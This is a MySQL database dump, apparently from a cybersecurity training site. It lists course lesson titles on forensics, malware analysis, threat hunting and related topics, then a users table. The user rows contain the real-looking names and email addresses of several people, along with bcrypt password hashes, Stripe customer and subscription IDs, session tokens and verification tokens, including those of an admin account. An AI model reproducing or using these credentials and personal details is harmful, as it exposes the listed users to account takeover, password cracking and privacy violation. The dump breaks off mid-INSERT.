(261, 26, 'Malware Categories', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(262, 26, 'Static vs Dynamic Analysis', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(263, 26, 'Setting Up a Safe Lab', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(264, 26, 'Static Analysis Tools', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(265, 26, 'Dynamic Analysis (Sandboxing)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(266, 26, 'Identifying IOCs from Malware', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(267, 26, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(271, 27, 'What is Incident Response?', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(272, 27, 'The IR Lifecycle (NIST)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(273, 27, 'Phase 1: Preparation', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(274, 27, 'Phase 2: Detection & Analysis', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(275, 27, 'Phase 3: Containment', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(276, 27, 'Phase 4: Eradication & Recovery', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(277, 27, 'Phase 5: Post-Incident Activity', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(278, 27, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(281, 28, 'What is Digital Forensics?', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(282, 28, 'The Forensic Process', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(283, 28, 'Evidence Handling & Chain of Custody', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(284, 28, 'Disk Imaging & Acquisition', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(285, 28, 'File System Analysis (NTFS/ext4)', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(286, 28, 'Windows Artifacts', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(287, 28, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(291, 29, 'Why Analyze Network Traffic?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(292, 29, 'Packet Capture Fundamentals', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(293, 29, 'Wireshark Essentials', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(294, 29, 'Analyzing TCP/HTTP Traffic', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(295, 29, 'Detecting Malicious Traffic', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(296, 29, 'Zeek (Bro) for Network Logs', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(297, 29, 'Final Quiz', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(301, 30, 'What is Threat Hunting?', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(302, 30, 'Hunting vs Detection', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(303, 30, 'The Hunting Loop', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(304, 30, 'Hypothesis-Driven Hunting', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(305, 30, 'Data Sources for Hunting', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(306, 30, 'Hunting Techniques', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(307, 30, 'Final Quiz', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(311, 31, 'What is MITRE ATT&CK?', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(312, 31, 'Tactics: The \"Why\"', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(313, 31, 'Techniques: The \"How\"', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(314, 31, 'Navigating the Matrix', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(315, 31, 'Using ATT&CK for Defense', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(316, 31, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(321, 32, 'Cloud Service Models (IaaS/PaaS/SaaS)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(322, 32, 'Shared Responsibility Model', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(323, 32, 'AWS Security Fundamentals', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(324, 32, 'Azure Security Fundamentals', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(325, 32, 'Cloud Misconfigurations', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(326, 32, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(331, 33, 'Why Automate Security?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(332, 33, 'SOAR Platforms Overview', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(333, 33, 'Playbook Design Principles', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(334, 33, 'Common Automation Use Cases', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(335, 33, 'Python for Security Automation', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(336, 33, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(341, 34, 'Why Documentation Matters', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(342, 34, 'Incident Timelines', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(343, 34, 'Writing Effective Reports', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(344, 34, 'Executive Summaries', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(345, 34, 'Metrics and KPIs', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(346, 34, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(349, 49, 'Understanding EDR Telemetry', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', NULL),
(350, 49, 'Analyzing Process Trees', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 233),
(351, 49, 'Detecting Lateral Movement', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 234),
(352, 49, 'Memory Injection Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 235),
(353, 49, 'Isolating infected Hosts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 236),
(359, 51, 'Writing SPL (Search Processing Language)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 242),
(360, 51, 'Correlating Events', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-26 18:15:01', 243),
(361, 36, 'SIEM Architecture Deep Dive', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 244),
(362, 36, 'Log Parsing & Normalization', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 245),
(363, 36, 'Advanced Correlation Rules', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 246),
(364, 36, 'Query Optimization', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 247),
(365, 36, 'Building Detection-as-Code', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 248),
(366, 36, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 249),
(367, 52, 'Phishing vs Spear Phishing', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31', NULL),
(368, 52, 'URL Analysis', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31', NULL),
(369, 53, 'CVSS Scoring System', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31', NULL),
(370, 53, 'Prioritizing Patches', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31', NULL),
(371, 37, 'Why Memory Forensics?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(372, 37, 'Memory Acquisition Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(373, 37, 'Volatility Framework Deep Dive', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(374, 37, 'Process Analysis & Injection Detection', NULL, 'reading', NULL, 50, 374, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(375, 37, 'Hunting Rootkits & Hidden Processes', NULL, 'reading', NULL, 50, 375, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(376, 37, 'Final Quiz', NULL, 'reading', NULL, 50, 376, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(381, 38, 'RE Fundamentals & Tools', NULL, 'reading', NULL, 50, 381, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(382, 38, 'x86/x64 Assembly Essentials', NULL, 'reading', NULL, 50, 382, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(383, 38, 'Static Analysis with IDA/Ghidra', NULL, 'reading', NULL, 50, 383, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(384, 38, 'Debugging with x64dbg', NULL, 'reading', NULL, 50, 384, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(385, 38, 'Unpacking & Anti-Analysis', NULL, 'reading', NULL, 50, 385, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(386, 38, 'Final Quiz', NULL, 'reading', NULL, 50, 386, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(391, 39, 'Threat Intel Lifecycle', NULL, 'reading', NULL, 50, 391, 1, '2025-12-27 02:21:00', '2025-12-27 02:21:00', NULL),
(392, 39, 'Collection & Sources', NULL, 'reading', NULL, 50, 392, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(393, 39, 'Analysis & Attribution', NULL, 'reading', NULL, 50, 393, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(394, 39, 'STIX/TAXII & Sharing', NULL, 'reading', NULL, 50, 394, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(395, 39, 'Operationalizing Intel', NULL, 'reading', NULL, 50, 395, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(396, 39, 'Final Quiz', NULL, 'reading', NULL, 50, 396, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(401, 40, 'Red, Blue, and Purple Teams', NULL, 'reading', NULL, 50, 401, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(402, 40, 'Red Team Operations', NULL, 'reading', NULL, 50, 402, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(403, 40, 'Blue Team Defense', NULL, 'reading', NULL, 50, 403, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(404, 40, 'Purple Team Exercises', NULL, 'reading', NULL, 50, 404, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(405, 40, 'Adversary Emulation', NULL, 'reading', NULL, 50, 405, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(406, 40, 'Final Quiz', NULL, 'reading', NULL, 50, 406, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(411, 41, 'Exercise Framework Setup', NULL, 'reading', NULL, 50, 411, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(412, 41, 'Exercise: Credential Dumping', NULL, 'reading', NULL, 50, 412, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(413, 41, 'Exercise: Lateral Movement', NULL, 'reading', NULL, 50, 413, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(414, 41, 'Exercise: Data Exfiltration', NULL, 'reading', NULL, 50, 414, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(415, 41, 'Metrics & Reporting', NULL, 'reading', NULL, 50, 415, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(416, 41, 'Final Quiz', NULL, 'reading', NULL, 50, 416, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(421, 42, 'Container Security Fundamentals', NULL, 'reading', NULL, 50, 421, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(422, 42, 'Docker Security Hardening', NULL, 'reading', NULL, 50, 422, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(423, 42, 'Kubernetes Security', NULL, 'reading', NULL, 50, 423, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(424, 42, 'Container Image Security', NULL, 'reading', NULL, 50, 424, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(425, 42, 'Runtime Protection', NULL, 'reading', NULL, 50, 425, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(426, 42, 'Final Quiz', NULL, 'reading', NULL, 50, 426, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(431, 43, 'Zero Trust Principles', NULL, 'reading', NULL, 50, 431, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(432, 43, 'Identity as the Perimeter', NULL, 'reading', NULL, 50, 432, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(433, 43, 'Microsegmentation', NULL, 'reading', NULL, 50, 433, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(434, 43, 'Continuous Verification', NULL, 'reading', NULL, 50, 434, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(435, 43, 'Zero Trust Implementation', NULL, 'reading', NULL, 50, 435, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(436, 43, 'Final Quiz', NULL, 'reading', NULL, 50, 436, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(441, 44, 'Security Frameworks Overview', NULL, 'reading', NULL, 50, 441, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(442, 44, 'NIST Cybersecurity Framework', NULL, 'reading', NULL, 50, 442, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(443, 44, 'ISO 27001 & 27002', NULL, 'reading', NULL, 50, 443, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(444, 44, 'SOC 2 Compliance', NULL, 'reading', NULL, 50, 444, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(445, 44, 'PCI-DSS & HIPAA', NULL, 'reading', NULL, 50, 445, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(446, 44, 'Final Quiz', NULL, 'reading', NULL, 50, 446, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(765, 117, 'What is Cyber Threat Intelligence?', 'Define CTI and understand the Pyramid of Value.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44', NULL),
(766, 117, 'The Intelligence Cycle', 'The 6 phases of CTI production.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(767, 117, 'Types of Threat Intelligence', 'Strategic, Operational, and Tactical.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(768, 117, 'Module 1 Assessment', 'Test your knowledge of CTI Fundamentals.', 'quiz', NULL, 100, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(769, 118, 'Introduction to OSINT', 'What is OSINT, The Framework, and OPSEC.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(770, 118, 'Domain & Infrastructure Recon', 'DNS, WHOIS, and Certificate Transparency.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(771, 118, 'Social Media & HUMINT', 'Investigating people and groups.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(772, 118, 'OSINT Tools Workshop', 'Hands-on: Google Dorks, Shodan, and Maltego.', 'reading', NULL, 50, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(773, 118, 'Module 2 Assessment', 'Test your OSINT knowledge.', 'quiz', NULL, 100, 5, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(774, 119, 'Introduction to Malware Analysis', 'Static vs Dynamic Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(775, 119, 'Key Indicators: Strings & Hashes', 'Extracting low-hanging fruit.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(776, 119, 'Module 3 Assessment', 'Test your Malware Analysis knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(777, 120, 'IOCs vs IOAs', 'Indicators of Compromise vs Attack.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(778, 120, 'Traffic Light Protocol (TLP)', 'Sharing standards.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(779, 120, 'Module 4 Assessment', 'Test your Indicators & Standards knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(780, 121, 'The ATT&CK Framework', 'Tactics, Techniques, and Procedures.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(781, 121, 'MITRE Navigator', 'Visualizing coverage.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(782, 121, 'Module 5 Assessment', 'Test your MITRE knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(783, 122, 'Introduction to Threat Hunting', 'The Hunter\'s Mindset: Assume Breach.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(784, 122, 'Hunting Techniques', 'Stacking and Clustering.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(785, 122, 'Module 6 Assessment', 'Test your Threat Hunting knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(786, 123, 'TIP Capabilities', 'Aggregation, Normalization, Dissemination.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(787, 123, 'MISP (Malware Information Sharing Platform)', 'The open source standard.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(788, 123, 'Module 7 Assessment', 'Test your TIP knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(789, 124, 'Writing Effective Intel Reports', 'BLUF, Estimative Language, and Audience Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(790, 124, 'Module 8 Assessment', 'Final Module Assessment.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `id` int(11) NOT NULL,
  `google_id` varchar(255) DEFAULT NULL,
  `name` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `password` varchar(255) DEFAULT NULL,
  `role` enum('normal','admin','alert-admin','pro') DEFAULT 'normal',
  `profile_picture` varchar(255) DEFAULT NULL,
  `subscription_plan` varchar(50) DEFAULT 'free',
  `subscription_status` varchar(50) DEFAULT 'active',
  `subscription_id` varchar(255) DEFAULT NULL,
  `customer_id` varchar(255) DEFAULT NULL,
  `cancel_at_period_end` tinyint(1) DEFAULT 0,
  `current_period_end` datetime DEFAULT NULL,
  `plan_start_date` datetime DEFAULT NULL,
  `plan_end_date` datetime DEFAULT NULL,
  `renewal_date` datetime DEFAULT NULL,
  `alerts_this_month` int(11) DEFAULT 0,
  `last_usage_reset` datetime DEFAULT current_timestamp(),
  `username` varchar(255) DEFAULT NULL,
  `surname` varchar(255) DEFAULT NULL,
  `is_verified` tinyint(1) DEFAULT 0,
  `verification_token` varchar(255) DEFAULT NULL,
  `reset_password_token` varchar(255) DEFAULT NULL,
  `reset_password_expires` datetime DEFAULT NULL,
  `failed_login_attempts` int(11) DEFAULT 0,
  `lock_until` datetime DEFAULT NULL,
  `badges` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `subscription_end_date` datetime DEFAULT NULL,
  `current_mission` int(11) DEFAULT 1,
  `training_completed` tinyint(1) DEFAULT 0,
  `email_preferences` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`email_preferences`)),
  `session_token` varchar(255) DEFAULT NULL,
  `primary_path` varchar(50) DEFAULT NULL,
  `secondary_path` varchar(50) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `primary_path`, `secondary_path`) VALUES
(1, NULL, 'Admin', 'halilbaris@gmail.com', '$2a$10$w5l/8r1kVhUJSgOKO5V01e3nh2tf2SgInRKF3VQGU5S2.L8tNXsHu', 'admin', '/uploads/1-1767061287330.jpg', 'monthly', 'active', 'sub_1ShZsNL5VKtXn66bbgkTLzUG', 'cus_TetfSZenusTeBk', 0, NULL, NULL, NULL, NULL, 0, '2025-12-12 22:00:24', 'admin', 'User', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-12 19:00:24', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', 'bda1b8b008378ec20674dee6302583ea4641a353cc22bf7a9886c4d94c413079', NULL, NULL),
(5, NULL, 'Rose', 'gulmairamsnv@gmail.com', '$2a$10$lcTDAr1stngbpoeDJAWON.rf4cKxAi8I6fuXrTz89vwOqMzRLZLVC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:26:08', 'RoseM', 'Maryam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:26:08', NULL, 1, 0, NULL, NULL, NULL, NULL),
(6, NULL, 'Elif', 'etkinelifilm@gmail.com', '$2a$10$A03K7rDjcC22ePJ9zAHcs.vMbfw9qSYeHER57z7aYcMFOQVv41c2W', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:46:00', 'cafeantinkuntin', 'E', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:46:00', NULL, 1, 0, NULL, NULL, NULL, NULL),
(7, NULL, 'Murat', 'muratdibi@outlook.com', '$2a$10$fx.y8i1Hq7/nvVfj/nzLfevLAF7SpfzN9LZonOZf6db3ANxM1C1ai', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:57:15', 'mudics', 'Dibi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:57:15', NULL, 1, 0, NULL, NULL, NULL, NULL),
(8, NULL, 'Mustafa', 'mustafatorun@gmail.com', '$2a$10$s8s4.SrBLUcV94UKjrrbZuydNoiWGXxVWm0iz6Q3zD0BNOuCkdHe.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 03:56:15', 'mustafa', 'Torun', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-16 00:56:15', NULL, 1, 0, '{\"weekly_report\": false, \"alert_assigned\": false, \"investigation_graded\": false, \"newsletter\": false}', '58f13a4e1e6cab5220426a382ae92801da197921267eaacf27d3d3f8436fdfd7', NULL, NULL),
(10, NULL, 'Yucel', 'yucelimm42@gmail.com', '$2a$10$JaRLuCiKcC.WSzbsJSR7Te6flFEXKS8hyJf2eXwXoQD.GQxqHhPd6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 16:56:16', 'yucel_imm', 'Onal', 0, '41d1f38b0beb5e91bcc43911ac6131d2116ae049e701eeee0260c3204610c3e1', NULL, NULL, 0, NULL, NULL, '2025-12-16 13:56:16', NULL, 2, 0, NULL, NULL, NULL, NULL),
(13, NULL, 'David', 'kokkiliculas@gmail.com', '$2a$10$qqMNOJ6cvL6DJyIeVa5NCuL58G2dfmniZikN/AOcwO5Tv7pLmTIEC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 5, '2025-12-17 17:48:09', 'TarcosS', 'Kokkilic', 0, '69d4c7e4054fd8508ae1841d771f7b03bb31093567a83ce0706075b15452d49c', NULL, NULL, 3, '2025-12-31 22:13:15', NULL, '2025-12-17 14:48:09', NULL, 4, 1, NULL, NULL, NULL, NULL),
(14, NULL, 'aysel', 'ayseleren.ca@gmail.com', '$2a$10$jFcft70J/vKkP0FW5M2JrOGOR8puIhXzg7myTagbJTo/JdRzJMysy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-17 20:20:32', 'aysel', 'eren', 0, '593ee24ef5795508b56a4417a2c96309bef078bf42f9d19014721edd42ee7db9', NULL, NULL, 0, NULL, NULL, '2025-12-17 17:20:32', NULL, 4, 1, NULL, NULL, NULL, NULL),
